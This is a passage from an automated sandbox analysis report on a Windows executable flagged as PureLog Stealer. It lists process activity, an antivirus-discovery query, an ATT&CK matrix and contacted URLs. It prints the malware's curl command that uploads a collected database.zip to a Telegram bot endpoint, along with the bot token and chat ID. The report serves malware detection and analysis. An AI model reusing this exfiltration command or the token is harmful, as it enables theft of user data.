          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csvJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\curl.exe "C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\curl.exe "c:\windows\system32\curl.exe" -x post -h "content-type: multipart/form-data" -f document=@c:\users\user\appdata\local\temp\database.zip -f chat_id=-1002165480850 https://api.telegram.org/bot7516945260:aahf6p58pj_k3-yc5ee4veoiq-d7pe8iyag/senddocument
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess created: C:\Windows\System32\curl.exe "c:\windows\system32\curl.exe" -x post -h "content-type: multipart/form-data" -f document=@c:\users\user\appdata\local\temp\database.zip -f chat_id=-1002165480850 https://api.telegram.org/bot7516945260:aahf6p58pj_k3-yc5ee4veoiq-d7pe8iyag/senddocumentJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Users\user\Desktop\n0PDCyrFnf.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\curl.exeQueries volume information: C:\Users\user\AppData\Local\Temp\database.zip VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: n0PDCyrFnf.exe, type: SAMPLE
          Source: Yara matchFile source: 0.0.n0PDCyrFnf.exe.880000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: n0PDCyrFnf.exe, type: SAMPLE
          Source: Yara matchFile source: 0.0.n0PDCyrFnf.exe.880000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts431
          Windows Management Instrumentation          		1
          DLL Side-Loading          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping431
          Security Software Discovery          		Remote Services11
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter          		Boot or Logon Initialization Scripts1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          PowerShell          		Logon Script (Windows)Logon Script (Windows)251
          Virtualization/Sandbox Evasion          		Security Account Manager251
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets23
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Obfuscated Files or Information          		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
          Software Packing          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          n0PDCyrFnf.exe28%VirustotalBrowse
          n0PDCyrFnf.exe100%AviraHEUR/AGEN.1323575
          n0PDCyrFnf.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          api.telegram.org2%VirustotalBrowse
          171.39.242.20.in-addr.arpa0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://crl.v0%URL Reputationsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessageP0%Avira URL Cloudsafe
          https://api.telegram.org0%Avira URL Cloudsafe
          https://api.telegram.org/bot0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentX0%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
          https://api.telegram.org/bot$token/sendDocument0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC:0%Avira URL Cloudsafe
          https://api.telegram.org/bot1%VirustotalBrowse
          https://api.telegram.org1%VirustotalBrowse
          http://www.t.com/pkiops/cersoft%20Time-Stam0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P580%Avira URL Cloudsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument80%Avira URL Cloudsafe
          https://api.telegram.org/bot$token/sendMessage0%Avira URL Cloudsafe
          http://go.microsoftLanguagePackManagement.psd10%Avira URL Cloudsafe
          https://api.telegram.org/bot$token/sendDocument0%VirustotalBrowse
          https://github.com/Pester/Pester1%VirustotalBrowse
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument-0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument0%Avira URL Cloudsafe
          http://go.microsoftL0%Avira URL Cloudsafe
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram.0%Avira URL Cloudsafe
          https://api.telegram.org/bot$token/sendMessage0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          api.telegram.org
          		149.154.167.220
          		truetrueunknown
          171.39.242.20.in-addr.arpa
          		unknown
          		unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessagefalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentfalse
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument_curl.exe, 00000003.00000003.1792740899.000001CC6B8BE000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.1793125910.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792855039.000001CC6B8BF000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://nuget.org/NuGet.exen0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://aka.ms/winsvr-2022-pshelpn0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessagePn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.orgn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://pesterbdd.com/images/Pester.pngn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/botn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentXn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/soap/encoding/n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmln0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot$token/sendDocumentn0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://contoso.com/Licensen0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconn0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentC:curl.exe, 00000003.00000002.1793058595.000001CC6B8A0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.t.com/pkiops/cersoft%20Time-Stamn0PDCyrFnf.exe, 00000000.00000002.1828302488.000000002015D000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pestern0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument8n0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000004C81000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://api.telegram.org/bot$token/sendMessagen0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003FCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://go.microsoftLanguagePackManagement.psd1n0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/wsdl/n0PDCyrFnf.exe, 00000000.00000002.1809982095.00000000041E9000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://contoso.com/n0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exen0PDCyrFnf.exe, 00000000.00000002.1823357610.0000000013E07000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument-curl.exe, 00000003.00000002.1793058595.000001CC6B8A8000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://go.microsoftLn0PDCyrFnf.exe, 00000000.00000002.1828937086.00000000226BC000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namen0PDCyrFnf.exe, 00000000.00000002.1809982095.0000000003DDE000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://crl.vn0PDCyrFnf.exe, 00000000.00000002.1825821731.000000001C7F0000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocumentapi.telegram.curl.exe, 00000003.00000003.1792902079.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792770937.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.1792789597.000001CC6B8BD000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          149.154.167.220
          		api.telegram.orgUnited Kingdom
          		62041TELEGRAMRUtrue

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1502365
          Start date and time:2024-09-01 01:08:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 8s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:n0PDCyrFnf.exe
          renamed because original name is a hash value
          Original Sample Name:3fb119b04cae83ea2ba10d7cbbcdffce895b07d6abd06a921626221aa3e0d279.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@7/13@2/2
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Stop behavior analysis, all processes terminated

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target n0PDCyrFnf.exe, PID 2588 because it is empty
